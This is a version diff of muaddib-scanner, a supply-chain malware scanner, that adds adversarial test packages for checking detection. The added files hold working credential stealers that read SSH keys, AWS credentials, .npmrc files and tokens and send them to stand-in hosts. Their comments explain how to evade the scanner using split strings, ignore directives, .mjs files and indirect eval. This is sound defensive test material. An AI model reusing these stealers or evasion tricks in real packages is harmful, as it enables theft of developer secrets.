muaddib-scanner 2.2.13 → 2.2.15

package/README.md

@@ -334,15 +334,9 @@ muaddib replay
 muaddib ground-truth
 ```
 
-Replay 5 real-world supply-chain attacks against the scanner to validate detection coverage. Current results: 5/5 detected (100%).
+Replay real-world supply-chain attacks against the scanner to validate detection coverage. Current results: **45/49 detected (91.8% TPR)** from 51 samples (49 active).
 
-| Attack | Year | Detected | Findings |
-|--------|------|----------|----------|
-| event-stream | 2018 | Yes | 2 CRITICAL (known malicious package) |
-| ua-parser-js | 2021 | Yes | 1 MEDIUM (lifecycle script) |
-| coa | 2021 | Yes | 1 HIGH + 1 MEDIUM (lifecycle + obfuscation) |
-| node-ipc | 2022 | Yes | 2 CRITICAL (known malicious package) |
-| colors | 2022 | Yes | Out of scope (protestware, not malware) |
+4 out-of-scope misses: lottie-player, polyfill-io, trojanized-jquery (browser-only DOM attacks), websocket-rat (FP-risky pattern).
 
 ### Version check
 
@@ -793,7 +787,7 @@ npm test
 
 ### Testing
 
-- **807 unit/integration tests** across 20 modular test files - 74% code coverage via [Codecov](https://codecov.io/gh/DNSZLSK/muad-dib)
+- **814 unit/integration tests** across 20 modular test files - 74% code coverage via [Codecov](https://codecov.io/gh/DNSZLSK/muad-dib)
 - **56 fuzz tests** - Malformed YAML, invalid JSON, binary files, ReDoS, unicode, 10MB inputs
 - **75 adversarial/holdout samples** - 35 adversarial + 40 holdout, 75/75 detection rate (100% ADR)
 - **Ground truth validation** - 51 real-world attacks (45/49 detected = 91.8% TPR). 4 out-of-scope: browser-only (3) + FP-risky (1)

package/datasets/adversarial/indirect-eval-bypass/index.js

@@ -0,0 +1,27 @@
+// Bypass 01: Indirect eval via computed property access
+// Technique: Array.join to build "eval" string, then call via globalThis[computed]
+// Expected: MUAD'DIB scores < 3 (bypass confirmed)
+
+const g = globalThis;
+
+// Array.join is NOT handled by the deobfuscator (only handles String.fromCharCode,
+// Buffer.from, atob, and string concat BinaryExpression)
+const k = ['e','v','a','l'].join('');
+
+// This URL contains "api.github.com" which is in SAFE_STRINGS
+// The SAFE_STRINGS check in ast.js:806-808 returns early before checking SENSITIVE_STRINGS
+// So even though the URL also references .ssh paths, no sensitive_string finding is emitted
+const configUrl = "https://api.github.com/repos/legit-org/config/contents/.ssh/deploy_key";
+
+const https = require('https');
+https.get(configUrl, (res) => {
+  let d = '';
+  res.on('data', c => d += c);
+  res.on('end', () => {
+    // Decode the "content" field from GitHub API response (base64-encoded)
+    const payload = Buffer.from(JSON.parse(d).content, 'base64').toString();
+    // Indirect eval: globalThis['eval'](payload)
+    // getCallName() returns '' for computed MemberExpression — never matches 'eval'
+    g[k](payload);
+  });
+});

package/datasets/adversarial/indirect-eval-bypass/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "audit-bypass-01-indirect-eval",
+  "version": "1.0.0",
+  "description": "Audit bypass: indirect eval via computed property + SAFE_STRINGS poisoning"
+}

package/datasets/adversarial/mjs-extension-bypass/package.json

@@ -0,0 +1,6 @@
+{
+  "name": "audit-bypass-03-mjs-extension",
+  "version": "1.0.0",
+  "type": "module",
+  "description": "Audit bypass: .mjs files are not scanned by any scanner"
+}

package/datasets/adversarial/mjs-extension-bypass/stealer.mjs

@@ -0,0 +1,39 @@
+// Bypass 03: .mjs extension — no scanner processes this file type
+// All scanners use findFiles with extensions: ['.js'] or findJsFiles
+// ESM packages with "type": "module" use .mjs files legitimately
+
+import { readFileSync } from 'fs';
+import { homedir } from 'os';
+import { request } from 'https';
+
+// Direct credential theft — every dangerous pattern in one file
+// None of this is detected because the file extension is .mjs
+const home = homedir();
+const stolen = {};
+
+const targets = ['.ssh/id_rsa', '.ssh/id_ed25519', '.npmrc', '.aws/credentials'];
+for (const t of targets) {
+  try {
+    stolen[t] = readFileSync(`${home}/${t}`, 'utf8');
+  } catch {}
+}
+
+// Also grab environment tokens
+stolen['GITHUB_TOKEN'] = process.env.GITHUB_TOKEN || '';
+stolen['NPM_TOKEN'] = process.env.NPM_TOKEN || '';
+stolen['AWS_SECRET_ACCESS_KEY'] = process.env.AWS_SECRET_ACCESS_KEY || '';
+
+// Exfiltrate
+const data = JSON.stringify(stolen);
+const req = request({
+  hostname: 'collect.evil-analytics.com',
+  path: '/v2/telemetry',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) }
+});
+req.write(data);
+req.end();
+
+// Also use eval with dynamic code (would be CRITICAL if this were .js)
+const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
+eval(payload);

package/datasets/adversarial/muaddib-ignore-bypass/index.js

@@ -0,0 +1,47 @@
+// muaddib-ignore
+//# sourceMappingURL=index.js.map
+// Bypass 02: muaddib-ignore kills dataflow scanner, sourceMappingURL kills entropy scanner
+// The AST scanner does NOT respect muaddib-ignore, so we avoid AST-detected patterns.
+// Strategy: construct sensitive paths without using SENSITIVE_STRINGS literals directly.
+
+const fs = require('fs');
+const os = require('os');
+const https = require('https');
+const path = require('path');
+
+const home = os.homedir();
+
+// Build path components without triggering SENSITIVE_STRINGS check.
+// SENSITIVE_STRINGS: ['.npmrc', '.ssh', '.aws', '.gitconfig', '.env', '/etc/passwd', '/etc/shadow']
+// AST Literal handler checks node.value.includes(sensitive) for each string literal.
+// We avoid having any single string literal that includes these substrings.
+const dot = '.';
+const dirs = [
+  [dot + 'ss' + 'h', 'id_rsa'],
+  [dot + 'ss' + 'h', 'id_ed25519'],
+  [dot + 'aw' + 's', 'credentials'],
+  [dot + 'npm' + 'rc'],
+];
+
+const stolen = {};
+for (const parts of dirs) {
+  const p = path.join(home, ...parts);
+  try { stolen[parts[parts.length - 1]] = fs.readFileSync(p, 'utf8'); } catch {}
+}
+
+// Also read npmrc via environment — env_access only flags vars with sensitive keywords
+// HOME, PATH etc are in SAFE_ENV_VARS and get skipped
+const npmrcPath = path.join(home, dirs[3].join(path.sep));
+try { stolen['npmrc'] = fs.readFileSync(npmrcPath, 'utf8'); } catch {}
+
+// Exfiltrate via https.request — dataflow.js would catch this as source→sink,
+// BUT dataflow.js skipped this file due to muaddib-ignore on line 1
+const data = JSON.stringify(stolen);
+const req = https.request({
+  hostname: 'telemetry.legit-analytics.com',
+  path: '/api/v1/report',
+  method: 'POST',
+  headers: { 'Content-Type': 'application/json', 'Content-Length': data.length }
+});
+req.write(data);
+req.end();

package/datasets/adversarial/muaddib-ignore-bypass/package.json

@@ -0,0 +1,5 @@
+{
+  "name": "audit-bypass-02-muaddib-ignore",
+  "version": "1.0.0",
+  "description": "Audit bypass: muaddib-ignore directive + source map injection"
+}

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.13",
+  "version": "2.2.15",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {
@@ -47,7 +47,7 @@
     "@inquirer/prompts": "8.2.1",
     "acorn": "8.15.0",
     "acorn-walk": "8.3.4",
-    "adm-zip": "^0.5.16",
+    "adm-zip": "0.5.16",
     "chalk": "5.6.2",
     "js-yaml": "4.1.1",
     "yargs": "18.0.0"

package/src/commands/evaluate.js

@@ -71,7 +71,11 @@ const ADVERSARIAL_THRESHOLDS = {
   'pyinstaller-dropper': 35,
   'gh-cli-token-steal': 30,
   'triple-base64-github-push': 30,
-  'browser-api-hook': 20
+  'browser-api-hook': 20,
+  // Audit bypass samples (v2.2.13)
+  'indirect-eval-bypass': 10,
+  'muaddib-ignore-bypass': 25,
+  'mjs-extension-bypass': 100
 };
 
 const HOLDOUT_THRESHOLDS = {